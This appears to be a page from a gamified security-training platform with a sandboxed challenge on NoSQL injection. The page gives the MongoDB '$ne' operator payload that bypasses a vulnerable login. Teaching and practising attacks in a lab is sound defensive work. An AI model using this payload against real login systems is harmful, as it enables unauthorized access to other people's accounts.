← All Challenges
Challenge 61 of 66

NoSQL Ninja

🔴 Elite Injection +150 XP

A MongoDB login uses $ne (not equal) operator vulnerability. Bypass authentication by injecting query operators.

NoSQL Ninja // sandbox
Send {"username":{"$ne":""},"password":{"$ne":""}} — matches any non-empty credentials.

🏆 Challenge Complete!

+150 XP earned
Next Challenge →
← Prev Next →